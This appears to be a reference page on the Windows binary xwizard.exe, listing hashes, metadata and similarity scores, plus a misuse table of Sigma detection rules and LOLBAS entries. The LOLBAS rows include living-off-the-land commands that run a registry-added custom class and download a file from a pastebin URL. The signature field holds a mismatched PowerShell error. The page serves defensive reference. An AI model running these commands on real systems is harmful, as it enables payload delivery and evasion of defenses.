• File Path: C:\windows\system32\xwizard.exe
  • Description: Extensible Wizards Host Process


Type Hash
MD5 2AFA70B713D8AF4279C9FDAE7AD08A9D
SHA1 4D3CE11E2053ECAE7094B25E94CE6530F22D92BF
SHA256 1FF04F65E3E09B6F960AED6C7A88C51FEE58ABC37D05848F4248CE409B018741
SHA384 14960C498BF8CBEECB384DEC66E13417C836C9424CA6A915A8330AEFFD75C6010ACDC180627B0ED3DE4997BC300E3EAF
SHA512 89C1B99789ECD205C5D963697B22CECE4E043E7BFAE10F68CEF36FE1237FE9A85F1E2D2E24CF5E1089D1B552027D9CEA16500241EEBE85875E9FC8EEEEBC7CE9
SSDEEP 1536:MhvOmwbTRLqt2Mb9zi6l5URDoq4OZZZLlCIib:6beLqt2Mxzi6l2RD68wb


  • Status: The file C:\windows\system32\xwizard.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 54
C:\WINDOWS\system32\ComputerDefaults.exe 49
C:\WINDOWS\system32\ComputerDefaults.exe 50
C:\Windows\system32\ComputerDefaults.exe 52
C:\windows\system32\ComputerDefaults.exe 57
C:\Windows\system32\ComputerDefaults.exe 50
C:\Windows\system32\xwizard.exe 52
C:\Windows\system32\xwizard.exe 46
C:\WINDOWS\system32\xwizard.exe 49
C:\WINDOWS\system32\xwizard.exe 47
C:\Windows\system32\xwizard.exe 58
C:\windows\SysWOW64\ComputerDefaults.exe 58
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 46
C:\Windows\SysWOW64\ComputerDefaults.exe 57
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 44
C:\Windows\SysWOW64\ComputerDefaults.exe 54
C:\Windows\SysWOW64\ComputerDefaults.exe 46
C:\WINDOWS\SysWOW64\xwizard.exe 50
C:\Windows\SysWOW64\xwizard.exe 58
C:\Windows\SysWOW64\xwizard.exe 54
C:\windows\SysWOW64\xwizard.exe 58
C:\Windows\SysWOW64\xwizard.exe 54
C:\WINDOWS\SysWOW64\xwizard.exe 57

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. DRL 1.0
sigma win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma win_class_exec_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
sigma win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma win_dll_sideload_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.